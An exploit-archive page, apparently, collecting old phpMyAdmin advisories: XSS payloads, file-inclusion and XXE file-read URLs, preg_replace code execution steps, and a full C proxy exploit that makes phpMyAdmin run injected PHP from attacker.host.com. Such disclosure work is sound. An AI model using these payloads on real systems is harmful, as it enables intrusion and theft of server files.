phpmyadmin
Search result for 'phpmyadmin'
(0.0445861816406 seconds)
benjamin moss/phpmyadmin.txt ( na)
vendor site:http://phpmyadmin.net/ product:PhpMyAdmin all version bug: xss permanent & full path disclosure global risk:high xss post : 1) create a table , with whatever name , when it's done , go to "operation" (/db_operations.php) and add a comment on your table with: </textarea>'"><script>alert(document.cookie)</script> ( the "alert" is only to show the xss is working ...) this is a serious security issue , because it's a permanent xss , when you get into phpmyadmin you will get your cookie stealed directly , without looking at the attacker_table. 2) /phpmyadmin/db_create.php variables : token=your_token&reload=1&db=[double xss(2 followed xss)] 3) /phpmyadmin/db_operations.php variables: db_collation=latin1_swedish_ci&db_copy=true&db=prout&token=your_token&newname=[xss] 4) /phpmyadmin/querywindow.php token=your_token&db=&table=&query_history_latest=[xss]&query_history_latest_db=[xss]&querydisplay_tab=[xss] querydisplay_tab xss get : http://site.com/phpmyadmin/sql.php?db=information_schema&token=your_token&goto=db_details_structure.php&table=CHARACTER_SETS&pos=</textarea>'"><script>alert(document.cookie)</script> Note: if there's a "token=" on this string ,it's because you need it , so replace this one with yours . full path disclosure : /scripts/check_lang.php /themes/darkblue_orange/layout.inc.php /index.php?lang[]= /index.php?target[]= /index.php?db[]= /index.php?goto[]= /left.php?server[]= /index.php?table[]= /server_databases.php?token=your_token&sort_by=" /index.php?db=information_schema&token=your_token&tbl_group[]= /db_printview.php?db=" /sql.php?back[]= laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit@gmail.com
PhpMyAdmin suffers from multiple cross site scripting vulnerabilities.
AlFa/phpmyadmin-xss.txt ( na)
---------------------------------------------------------------------------------
| ____ ____.__ __ |
| \ \ / /|__|_______/ |_ __ _______ ___ ___ |
| \ Y / | \_ __ \ __\ | \__ \ \ \/ / |
| \ / | || | \/| | | | // __ \_> < |
| \___/ |__||__| |__| |____/(____ /__/\_ \ |
| \/ \/ |
| Security without illusions |
| www.virtuax.be |
| |
---------------------------------------------------------------------------------
Application: Phpmyadmin
Vulnerable Versions: <= v2.8.1
Vulnerability: XSS
Vendor: http://www.phpmyadmin.net
Vendor Status: notified
Found: 11-01-2007
Public Release Date: 12-01-2007
Last modified: 12-01-2007
Author: AlFa
reference: http://www.virtuax.be/advisories/Advisory1-12012007.txt
=================================================================================
Shouts to Ciri, ShadoW, RedFern, Dreamer and the rest of the Virtuax Community =)
=================================================================================
I. Background
-------------
"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL
over the Web. Currently it can create and drop databases, create/drop/alter tables,
delete/edit/add fields, execute any SQL statement, manage keys on fields, manage
privileges,export data into various formats and is available in 50 languages."
by phpmyadmin.net
This issue was fixed in phpmyadmin v2.8.2
[quote=changelog]
2006-06-30 Marc Delisle <lem9@users.sourceforge.net>
* libraries/common.lib.php: escape also single quotes
### 2.8.2 released from QA_2_8
2006-06-28 Marc Delisle <lem9@users.sourceforge.net>
* libraries/common.lib.php: escape allowed parameters from non-token
requests
[/quote]
II. Vulnerability
-----------------
Originally phpMyAdmin < 2.6.2-rc1 contained a XSS vulnerability caused due to
missing validation of input supplied to "convcharset" variable (reference:
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-3). This problem was
solved by sanitizing $convcharset by pulling it trough the PMA_sanitize() function.
However that function only checks for > and < and and neglects quotes in all versions
prior to 2.8.1. Here is some code:
[code=./libraries/common.lib.php]
// XSS
if (isset($convcharset)) {
$convcharset = PMA_sanitize($convcharset);
}
[/code]
[code=./libraries/sanitizing.lib.php]
function PMA_sanitize($message)
{
$replace_pairs = array(
'<' => '<',
'>' => '>',
'[i]' => '<em>', // deprecated by em
'[/i]' => '</em>', // deprecated by em
'[em]' => '<em>',
'[/em]' => '</em>',
'[b]' => '<strong>', // deprecated by strong
'[/b]' => '</strong>', // deprecated by strong
'[strong]' => '<strong>',
'[/strong]' => '</strong>',
'[tt]' => '<code>', // deprecated by CODE or KBD
'[/tt]' => '</code>', // deprecated by CODE or KBD
'[code]' => '<code>',
'[/code]' => '</code>',
'[kbd]' => '<kbd>',
'[/kbd]' => '</kbd>',
'[br]' => '<br />',
'[/a]' => '</a>',
);
return preg_replace('/\[a@([^"@]*)@([^]"]*)\]/', '<a href="\1" target="\2">', strtr($message, $replace_pairs));
}
[/code]
Now because we can't use > or < we can't escape from the input field,
so we have to use attributes to get this trick working. We can use the
attribute style to insert some css code and call javascript
just like we can do in a regular cascade style sheet. eg:
STYLE="background-image: url(javascript:alert('XSS'))"
IIa. Affected Browsers
----------------------
All versions of Firefox seem to be unvulnerable to this attack (1.5 and 2.0 tested).
Opera also seems to be safe (v8.53 and v9.10 tested)
IE 6.x is not safe but IE 7.x is. Not yet tested: IE 5.x (but IE 5.2 for Mac seems to be unvulnerable).
III. PoC
--------
https://phpmyadmin.example.com/?convcharset=%22%20STYLE=%22background-image:%20url(javascript:alert('XSS'))%22%20r=%22
IV. Solution
------------
A. Quickfix
Replace this code (./main.php):
<input type="hidden" name="convcharset" value="<?php echo $convcharset; ?>" />
with this code:
<input type="hidden" name="convcharset" value="<?php echo addslashes($convcharset); ?>" />
B. upgrade to the new(er/est) version of phpmyadmin which you can find here:
http://www.phpmyadmin.net/home_page/downloads.php
V. Timeline
-----------
11-01-2007: vulnerability found + contact with vendor
12-01-2007: public disclosure + vendor removed old (vulnerable) versions from download section
Copyright 2007 by Alfa from Virtuax.be All rights reserved.
PhpMyAdmin versions 2.8.1 and below suffer from a cross site scripting vulnerability.
Nasir Simbolon/phpMyAdmin257.txt ( na)
Software : phpMyAdmin
Version : 2.5.7
Vulnerability : php codes injection
Problem-Type : remote user
phpMyAdmin is web-based mysql administration written
in PHP.
There is a vulnerability in phpMyAdmin version 2.5.7.
This vulnerability would allow remote user to inject
php codes
to be executed by eval() function (in file left.php).
However, This vulnerability only effect if variable
$cfg['LeftFrameLight']
set to FALSE (in file config.inc.php)
1. Bugs
The Bugs are phpMyAdmin do not prevent any user
from
1.a. Ability to grow up array variables by way of GET
params
PhpMyAdmin has multiple servers configuration stored
in array variables ($cfg['Servers'][$i]). They are
coded in file
config.inc.php.
They are usually set at instalation time by owner.
Each configuration contains mysql server information
to be used
by phpMyAdmin as host, port, user, password,
authentication type, database
name etc of mysql server.
Up to three servers configuration is provided by
default.
However, Uninitialized $cfg['Servers'][$i] allows
remote user to add server
configuration to the list of servers configuration by
growing up
$cfg['Servers'][$i] array through GET parameters.
Remote user could add server configuration like this
http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg[Servers]
[4]
[host]=202.81.x.x&cfg[Servers][4]
[port]=8888&cfg[Servers][4][user]=alice ..
and so forth.
The running script will use the fourth server
configuration which remote user
supply.
1.b. Escape 'magic' quote (') oops
if variable $cfg['LeftFrameLight'] set to FALSE, this
part of codes is
executed.
$eval_string = '$tablestack[\'' . implode('\'][\'',
$_table) . '\']
[\'pma_name\'][] = \'' . str_replace('\'', '\\\'',
$table) . '\';';
eval($eval_string);
$eval_string will be php codes that executed by
function eval().
if we have one table named 'mytable', $eval_string
will have string value
$tablestack['']['pma_name'][] = 'mytable';
phpMyAdmin is improper to handle escaping single
quote.
So that with crafted table name with its name
contains meta-chars like this
\';exec(\"touch /tmp/touchable\");/*
$eval_string will have value
$tablestack['']['pma_name'][] =
'\\';exec("touch /tmp/touchable");/*';
In php language, It will interpret the string as
three php statements. The
second statement will be our exploite codes. The
last statement without
trailing comment just give a warning message in
php.
2. Exploite
Since mysql does not allow table name contain
meta-chars, we have to provide
a wrapper of mysql server. The wrapper acts like a
proxy except that it will
sends a fake table name, when client request a "SHOW
TABLES" query, by
replacing the real table name with a string contains
exploite codes.
http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg[Servers]
[4]
[host]=attacker.host.com&cfg[Servers][4]
[port]=8889&cfg[Servers][4]
[auth_type]=config&cfg[Servers][4]
[user]=user&cfg[Servers][4]
[password]=pass&cfg[Servers][4]
[connect_type]=tcp&&cfg[Servers][4]
[only_db]=databasename
In attacker.host.com mysql wrapper will listen in
port 8889 waiting for
connection.
3. Proof of Concept
The exploite code, mysql wrapper written in c, can be
founded in attachment
or from
http://eagle.kecapi.com/sec/codes/phpmy-explt.c
4. Purpose
This full disclosure is intended to be educational
purpose.
Regards,
Nasir Simbolon
http://eagle.kecapi.com
--
timor Domini
-------------------------------------------------------
phpmy-explt.c
/*
* phpmy-explt.c
* written by Nasir Simbolon <nasir@kecapi.com>
* http://eagle.kecapi.com
* Jakarta, Indonesia
*
* June, 10 2004
*
* A phpMyAdmin-2.5.7 exploite program.
* This is a kind of mysql server wrapper acts
like a proxy except that it will sends a fake table
name,
* when client query "SHOW TABLES", by replacing the
real table name with a string contains exploite
codes.
*
* Compile : gcc phpmy-explt.c -o phpmy-explt
*
* run with
* ./phpmy-explt
*
* and go to your target and put
*
*
http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg[Servers]
[4][host]=attacker.host.com&cfg[Servers][4]
[port]=8889&cfg[Servers][4]
[auth_type]=config&cfg[Servers][4]
[user]=user&cfg[Servers][4]
[password]=pass&cfg[Servers][4]
[connect_type]=tcp&&cfg[Servers][4]
[only_db]=databasename
*
* fill host,port,user,pass and databasename
correctly
*
*/
#include<stdio.h>
#include<sys/socket.h>
#include<netdb.h>
#define BIND_PORT 8889
#define MYSQL_PORT 3306
#define HOSTNAME "localhost"
#define DATABASE "phpmy"
#define BUFFER_LEN 1024
/* This is php code we want to inject into phpMyAdmin
Do NOT use single quote (') in the string, use
double quote (") instead
*/
char *phpcodes =
"exec(\"touch /tmp/your-phpmyadmin-is-vulnerable\");";
/* This is examples codes I captured when mysql
server
reply to client's request of query "SHOW TABLES"
query.
It shows database name 'phpmy' and contain one
tablename 'mytable'
Our aim is to manipulate the data received from
mysql server
by replacing 'mytable' with our exploide codes.
0x1 ,0x0 ,0x0 ,0x1 ,0x1 ,0x1b,0x0 ,0x0 ,0x2 ,0x0 ,
0xf ,'T' ,'a' ,'b' ,'l' ,'e' ,'s' ,'_' ,'i' ,'n' ,
'_' ,'p' ,'h' ,'p' ,'m' ,'y' ,0x3 ,0x40,0x0 ,0x0 ,
0x1 ,-2 ,0x3 ,0x1 ,0x0 ,0x1f,0x1 ,0x0 ,0x0 ,0x3 ,
-2 ,8 ,0x0 ,0x0 ,0x4 ,7 ,'m' ,'y' ,'t' ,'a' ,
'b' ,'l' ,'e' ,0x1 ,0 ,0 ,0x5 ,-2
*/
int build_exploite_code(char* dbname,char*
phpcodes,char** expcode)
{
char my1[21] =
{0x1 ,0x0 ,0x0 ,0x1 ,0x1 ,0x1b,0x0 ,0x0 ,0x2 ,0x0 ,
0xf ,'T' ,'a' ,'b' ,'l' ,'e' ,'s' ,'_' ,'i' ,'n' ,
'_'};
/* part of dbname ('p' ,'h' ,'p' ,'m' ,'y') */
char my2[15] =
{0x3 ,0x40,0x0 ,0x0 ,0x1 ,-2 ,0x3 ,0x1 ,0x0 ,0x1f,
0x1 ,0x0 ,0x0 ,0x3 ,-2};
/* part of int phpcodes string length +1 (8) */
char my3[3] = {0x0 ,0x0 ,0x4};
/* part of int phpcodes string length (7) */
/* part of tablename
('m' ,'y' ,'t' ,'a' ,'b' ,'l' ,'e' ) */
char my4[5] = {0x1 ,0 ,0 ,0x5 ,-2};
int len,i;
len = 21 + strlen(dbname) + 15 + 1 + 3 + 1 +
strlen(phpcodes) + 5 + 5;
*expcode = (char*) malloc(sizeof(char) * len);
i = 0;
bcopy(&my1[0],*expcode + i,21);
i += 21;
bcopy(dbname, *expcode + i,strlen(dbname));
i += strlen(dbname);
bcopy(&my2[0],*expcode + i,15);
i += 15;
(*expcode)[i] = 5 + strlen(phpcodes) + 1;
i ++;
bcopy(&my3[0],*expcode + i,3);
i += 3;
(*expcode)[i++] = 5 + strlen(phpcodes) ;
/* this is our exploite codes*/
(*expcode)[i++] = '\\';
(*expcode)[i++] = '\'';
(*expcode)[i++] = ';';
bcopy(phpcodes,*expcode + i,strlen(phpcodes));
i += strlen(phpcodes);
(*expcode)[i++] = '/';
(*expcode)[i++] = '*';
bcopy(&my4[0],*expcode + i,5);
return len;
}
/* connect to mysql server*/
int connect_mysql()
{
int s2;
struct sockaddr_in ina;
struct hostent *h;
h = gethostbyname(HOSTNAME);
/* set internet address */
bcopy(h->h_addr,(void
*)&ina.sin_addr,h->h_length);
ina.sin_family = AF_INET;
ina.sin_port = htons(MYSQL_PORT);
//ina.sin_zero[0]='\0';
if((s2=socket(AF_INET,SOCK_STREAM,0)) < 0)
perror("Socket: ");
if(connect(s2,(struct sockaddr
*)&ina,sizeof(ina)) < 0 )
perror("connect()");
return s2;
}
/* listener */
int listener()
{
int s1;
int opt;
struct sockaddr_in ina;
/* set internet address */
ina.sin_family = AF_INET;
ina.sin_port = htons(BIND_PORT);
ina.sin_addr.s_addr = INADDR_ANY;
if((s1=socket(AF_INET,SOCK_STREAM,0)) < 0)
perror("Socket: ");
opt = 1;
setsockopt(s1,SOL_SOCKET, SO_REUSEADDR , (char
*)&opt, sizeof(opt) );
if(bind(s1,(struct sockaddr
*)&ina,sizeof(ina))==-1)
perror("Bind: ");
if(listen(s1, 10) == -1)
perror("Listen");
return s1;
}
int main(int argc,char* argv[])
{
struct sockaddr_in ina1;
int ina1_l;
int s_daemon,s_mysql;
size_t byte_read,byte_written;
char *buf;
int sc,event,n_select;
fd_set rfds;
struct timeval tv;
int exptlen,i;
char *expt;
char *dbname=DATABASE;
buf = (char*) malloc(sizeof(char) *
(BUFFER_LEN));
tv.tv_sec = 15;
tv.tv_usec = 0;
/* we listen to port */
s_daemon = listener();
exptlen =
build_exploite_code(dbname,phpcodes,&expt);
for(;;)
{
fprintf(stderr,"waiting for
connection\n");
if( -1 == (sc = accept(s_daemon,(struct
sockaddr *) &ina1,&ina1_l)) )
perror("accept()");
/* if we get here, we have a new
connection */
fprintf(stderr,"got client connection\n");
mysql:
/* connect to mysql */
s_mysql = connect_mysql();
for(;;)
{
FD_ZERO(&rfds);
FD_SET(sc,&rfds);
FD_SET(s_mysql,&rfds);
n_select = (sc > s_mysql)? sc :
s_mysql;
event =
select(n_select+1,&rfds,NULL,NULL,NULL);
if(-1 == event)
perror("select()");
else
{
if(FD_ISSET(s_mysql,&rfds))
{
byte_read =
read(s_mysql,buf,BUFFER_LEN);
/* check for closing client
connection*/
if(byte_read == 0)
{
shutdown(s_mysql,SHUT_RDWR);
close(s_mysql);
goto mysql;
}
/* check data received from
mysql server.
* if buf[11] contain 'T',
data received from mysq server is table list
*
* NOW we replace the table
with our exploite codes and send them to client
*/
if( 'T' == buf[11])
{
for(i=0;i<exptlen;i++)
buf[i] = expt[i];
byte_read = exptlen;
}
if(write(sc, buf, byte_read)
< 0)
break;
}
if(FD_ISSET(sc,&rfds))
{
byte_read =
read(sc,buf,BUFFER_LEN);
/* check for closing client
connection*/
if(byte_read == 0)
{
close(sc);
break;
}
if(write(s_mysql,buf,byte_read)
< 0)
break;
}
#if defined(DEBUG)
fprintf(stderr,"data:\n");
for(i=0;i<byte_read;i++)
fprintf(stderr," %c(%x)
",buf[i],buf[i]);
#endif
}
}
}
free(buf);
free(expt);
return 0;
}
phpMyAdmin version 2.5.7 is susceptible to allowing remote malicious users the ability to inject PHP code. Full exploit provided.
Maksymilian Arciemowicz/phpMyAdmin261.txt ( na)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpMyAdmin 2.6.1 Remote file inclusion and XSS cXIb8O3.4]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 24.2.2005
- --- 0.Description ---
phpMyAdmin 2.6.1 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.
- --- 1. Remote file inclusion ---
1.0
This bug exist in css/phpmyadmin.css.php. You can
include files. Error exist in
Code:
- ------
$tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' .
$theme . '/css/theme_right.css.php';
if (@file_exists($tmp_file)) {
include($tmp_file);
} // end of include theme_right.css.php
- ------
And now you can get files.
For exemple:
http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00
http://[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00
etc.
1.1
Or next include is in libraries/database_interface.lib.php
Code:
- ---
18# require_once('./libraries/dbi/' . $cfg['Server']['extension'] . '.dbi.lib.php');
- ---
For exemple:
http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3
Error message :
- ---------------
Warning: main(./libraries/dbi/cXIb8O3.dbi.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18
Fatal error: main() [function.require]: Failed opening
required './libraries/dbi/cXIb8O3.dbi.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18
- ---------------
Or if you want and if you see php error and register_globals=on, can you make
xss with php buq. For Exemple:
http://[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=%3Ch1%3EHi.%20I%20am%20cXIb8O3%3C/h1%3E
- --- 2. XSS aka Cross Site Scripting ---
If register_globals=On:
2.0
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS
2.1
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]
2.2
http://[HOST]/[DIR]/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
and more in this file.
2.3
http://[HOST]/[DIR]/themes/original/css/theme_right.css.php?right_font_family=[XSS]
and more in this file.
- --- 3. How to fix ---
CVS or
https://sourceforge.net/tracker/download.php?group_id=23067&atid=377408&file_id=122735&aid=1149381 >> libraries/grab_globals.lib.php or wait for new version..
- --- 4. Greets ---
sp3x.
i need help.. :(
- --- 5.Contact ---
Author: Maksymilian Arciemowicz
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://security.jestsuper.pl
http://securityreason.com/ Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)
iD8DBQFCHR89znmvyJCR4zQRAtj3AJ4wxM3WEn56GNohsG3f4U8Ku+/I8wCeMWQr
YklTAm82iDqNu3so1uYsmEk=
=ko9x
-----END PGP SIGNATURE-----
phpMyAdmin versions 2.6.1 and below suffer from remote file inclusion and cross site scripting flaws. Detailed exploitation given.
WooYun/phpMyAdmin Arbitrary File Read ( na)
Hi
80sec report this bug on wooyun,PhpMyadmin use a simplexml_load_string
function to read xml from user input,this may be exploied to read files
from the server or network
in libraries/import/xml.php,some code like this
/**
* Load the XML string
*
* The option LIBXML_COMPACT is specified because it can
* result in increased performance without the need to
* alter the code in any way. It's basically a freebee.
*/
$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);
unset($buffer);
/**
* The XML was malformed
*/
if ($xml === FALSE) {
so you just need to make a xml like this
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE wooyun [
<!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">
]>
<pma_xml_export version="1.0" xmlns:pma="
http://www.phpmyadmin.net/some_doc_url/">
<!--
- Structure schemas
-->
<pma:structure_schemas>
<pma:database name="test" collation="utf8_general_ci"
charset="utf8">
<pma:table name="ts_ad">
&hi80sec;
</pma:table>
</pma:database>
</pma:structure_schemas>
<!--
- Êý¾Ý¿â: 'thinksns'
-->
<database name="thinksns">
<!-- ±í ts_ad -->
</database>
</pma_xml_export>
then import this xml in PhpMyAdmin,you will get the content you want.
From:http://www.wooyun.org/bugs/wooyun-2010-03185
:)
phpMyAdmin suffers from a remote arbitrary file reading vulnerability when using a simplexml_load_string function meant to read xml from user input.
waraxe/phpMyAdmin 3.5.8 and 4.0.0-RC2 - Multiple Vulnerabilities ( php)
[waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin
===============================================================================
Author: Janek Vind "waraxe"
Date: 25. April 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-103.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the World Wide Web. phpMyAdmin supports a wide
range of operations with MySQL.
http://www.phpmyadmin.net/home_page/index.php
###############################################################################
1. Remote code execution via preg_replace() in "libraries/mult_submits.inc.php"
###############################################################################
Reason:
1. insufficient sanitization of user data before using in preg_replace
Attack vectors:
1. user-supplied parameters "from_prefix" and "to_prefix"
Preconditions:
1. logged in as valid PMA user
2. PHP version < 5.4.7 (Newer versions: Warning: preg_replace(): Null byte in regex)
PMA security advisory: PMASA-2013-2
CVE id: CVE-2013-3238
Affected phpMyAdmin versions: 3.5.8 and 4.0.0-RC2
Result: PMA user is able to execute arbitrary PHP code on webserver
Let's take a look at the source code:
Php script "libraries/mult_submits.inc.php" line 426 (PMA version 3.5.8):
------------------------[ source code start ]----------------------------------
case 'replace_prefix_tbl':
$current = $selected[$i];
$newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);
$a_query = 'ALTER TABLE ' . PMA_backquote($selected[$i]) . ' RENAME ' .
PMA_backquote($newtablename) ; // CHANGE PREFIX PATTERN
$run_parts = true;
break;
case 'copy_tbl_change_prefix':
$current = $selected[$i];
$newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);
$a_query = 'CREATE TABLE ' . PMA_backquote($newtablename) . ' SELECT * FROM '
. PMA_backquote($selected[$i]) ; // COPY TABLE AND CHANGE PREFIX PATTERN
$run_parts = true;
break;
------------------------[ source code end ]------------------------------------
We can see, that PHP variables "$from_prefix" and "$to_prefix" are used in
preg_replace function without any sanitization. It appears, that those variables
are coming from user submitted POST request as parameters "from_prefix" and
"to_prefix". It is possible to inject e-modifier with terminating null byte via
first parameter and php code via second parameter. In case of successful
exploitation injected PHP code will be executed on PMA webserver.
Tests:
1. Log in to PMA and select database:
http://localhost/PMA/index.php?db=test&token=25a6ce9e288070bd28c3f9aebffad1b8
2. select one table from database by using checkbox and then select
"Replace table prefix" from select control "With selected:".
3. We can see form named "Replace table prefix:" with two input fields.
Type "/e%00" to the "From" field and "phpinfo()" to the "To" field.
4. Activate Tamper Data Firefox add-on:
https://addons.mozilla.org/en-us/firefox/addon/tamper-data/
5. Click "Submit", Tamper Data pops up, choose "Tamper".
6. Now we can modify POST request. Look for parameter "from_prefix".
It should be "%2Fe%2500", remove "25", so that it becomes "%2Fe%00".
Click "OK" and Firefox will send out manipulated POST request.
7. We are greeted by phpinfo function output - code execution is confirmed.
PMA version 4.0.0-RC2 contains almost identical vulnerability:
Php script "libraries/mult_submits.inc.php" line 482 (PMA version 4.0.0-RC2):
------------------------[ source code start ]----------------------------------
case 'replace_prefix_tbl':
$current = $selected[$i];
$newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current);
$a_query = 'ALTER TABLE ' . PMA_Util::backquote($selected[$i]) .
' RENAME ' . PMA_Util::backquote($newtablename); // CHANGE PREFIX PATTERN
$run_parts = true;
break;
case 'copy_tbl_change_prefix':
$current = $selected[$i];
$newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current);
$a_query = 'CREATE TABLE ' . PMA_Util::backquote($newtablename) .
' SELECT * FROM ' . PMA_Util::backquote($selected[$i]); // COPY TABLE AND CHANGE PREFIX PATTERN
$run_parts = true;
break;
------------------------[ source code end ]------------------------------------
############################################################################
2. Locally Saved SQL Dump File Multiple File Extension Remote Code Execution
############################################################################
Reason:
1. insecure names of locally saved dump files
Attack vectors:
1. user-supplied POST parameter "filename_template"
Preconditions:
1. logged in as valid PMA user
2. configuration setting "SaveDir" defined and pointed to
directory, which is writable for php and directly accessible over web
(by default "SaveDir" is empty and PMA is secure)
3. Apache webserver with unknown MIME for "sql" extension
PMA security advisory: PMASA-2013-3
CVE id: CVE-2013-3239
Affected are PMA versions 3.5.8 and 4.0.0-RC2
There is a security weakness in a way, how PMA handles
locally saved database dump files. It is possible, that saved
dump file has multiple extensions and if Apache webserver does not
know MIME type of "sql" extension (that's how it is by default),
then for example "foobar.php.sql" file will be treated as php file.
More information:
http://httpd.apache.org/docs/2.2/mod/mod_mime.html
section "Files with Multiple Extensions"
http://www.acunetix.com/websitesecurity/upload-forms-threat/
section "Case 4: Double extensions (part 1)"
Test:
1. activate export to local server, be sure, that directory is writable:
$cfg['SaveDir'] = './';
2. select database for test, insert row into table with included
php code like "<?php phpinfo();?>"
3. try to export that database or table, you have now additional option:
"Save on server in the directory ./"
Confirm that option, let the format be as "SQL".
"File name template" change to "@DATABASE () php" and click "Go" button.
Server responds with "Dump has been saved to file ./test.php.sql."
4. Request created file with webbrowser:
http://localhost/PMA/test.php.sql
In case of success we can see output of phpinfo() function, which
confirms remote code execution.
###############################################################################
3. Local File Inclusion in "export.php"
###############################################################################
Reason:
1. insufficient sanitization of user data before using in include_once
Attack vectors:
1. user-supplied POST parameter "what"
Preconditions:
1. logged in as valid PMA user
2. PHP must be < 5.3.4 for null-byte attacks to work
PMA security advisory: PMASA-2013-4
CVE id: CVE-2013-3240
Affected is PMA version 4.0.0-RC2
Php script "export.php" line 20:
------------------------[ source code start ]----------------------------------
foreach ($_POST as $one_post_param => $one_post_value) {
$GLOBALS[$one_post_param] = $one_post_value;
}
PMA_Util::checkParameters(array('what', 'export_type'));
// export class instance, not array of properties, as before
$export_plugin = PMA_getPlugin(
"export",
$what,
'libraries/plugins/export/',
array(
'export_type' => $export_type,
'single_table' => isset($single_table)
)
);
------------------------[ source code end ]------------------------------------
We can see, that user-supplied parameter "what" is used as second argument for
the function PMA_getPlugin(). Let's follow execution flow:
Php script "libraries/plugin_interface.lib.php" line 20:
------------------------[ source code start ]----------------------------------
function PMA_getPlugin(
$plugin_type,
$plugin_format,
$plugins_dir,
$plugin_param = false
) {
$GLOBALS['plugin_param'] = $plugin_param;
$class_name = strtoupper($plugin_type[0])
. strtolower(substr($plugin_type, 1))
. strtoupper($plugin_format[0])
. strtolower(substr($plugin_format, 1));
$file = $class_name . ".class.php";
if (is_file($plugins_dir . $file)) {
include_once $plugins_dir . $file;
------------------------[ source code end ]------------------------------------
As seen above, second argument "$plugin_format" is used in variable "$file"
and after that in functions is_file() and include_once(). No sanitization
is used against user submitted parameter "what", which leads to directory
traversal and local file inclusion vulnerability. In case of older PHP version
it may be possible to use null byte attack and include arbitrary files on server.
###############################################################################
4. $GLOBALS array overwrite in "export.php"
###############################################################################
Reason:
1. insecure POST parameters importing
Attack vectors:
1. user-supplied POST parameters
Preconditions:
1. logged in as valid PMA user
PMA security advisory: PMASA-2013-5
CVE id: CVE-2013-3241
Affected is PMA version 4.0.0-RC2
Php script "export.php" line 20:
------------------------[ source code start ]----------------------------------
foreach ($_POST as $one_post_param => $one_post_value) {
$GLOBALS[$one_post_param] = $one_post_value;
}
PMA_Util::checkParameters(array('what', 'export_type'));
------------------------[ source code end ]------------------------------------
We can see, that arbitrary values in $GLOBALS array can be overwritten by
submitting POST parameters. Such way of input data importing can be considered
as very insecure and in specific situation it is possible to overwrite any
variable in global scope. This can lead to many ways of exploitation. Below is
presented one of the possibilities.
Php script "export.php" line 59:
------------------------[ source code start ]----------------------------------
$onserver = false;
$save_on_server = false;
...
if ($quick_export) {
$onserver = $_REQUEST['quick_export_onserver'];
} else {
$onserver = $_REQUEST['onserver'];
}
// Will we save dump on server?
$save_on_server = ! empty($cfg['SaveDir']) && $onserver;
...
// Open file on server if needed
if ($save_on_server) {
$save_filename = PMA_Util::userDir($cfg['SaveDir'])
. preg_replace('@[/\\\\]@', '_', $filename);
...
if (! $file_handle = @fopen($save_filename, 'w')) {
$message = PMA_Message::error(
...
/* If we saved on server, we have to close file now */
if ($save_on_server) {
$write_result = @fwrite($file_handle, $dump_buffer);
fclose($file_handle);
------------------------[ source code end ]------------------------------------
As seen above, when configuration setting "SaveDir" is set, then it is possible
to save database dump to the PMA webserver. By default "SaveDir" is unset and
this prevents possible security problems. As we can overwrite any variables in
global scope, it is possible to set "SaveDir" to arbitrary value. This will
lead to directory traversal vulnerability - attacker is able to save database
dump to any directory in webserver, if only filesystem permissions allow that.
Database dump can be with extension ".sql". If attacker can dump database
with php code and tags in it, this content will be in dump file. If filename
is something like "foobar.php.sql", then by default most Apache webserver
installations will try to parse this dump file as php file, which can finally
lead to the remote code execution vulnerability.
Disclosure timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
16.04.2013 -> Sent email to developers
16.04.2013 -> First response email from developers
16.04.2013 -> Sent detailed information to developers
24.04.2013 -> New PMA versions and security advisories released
25.04.2013 -> Current advisory released
Contact:
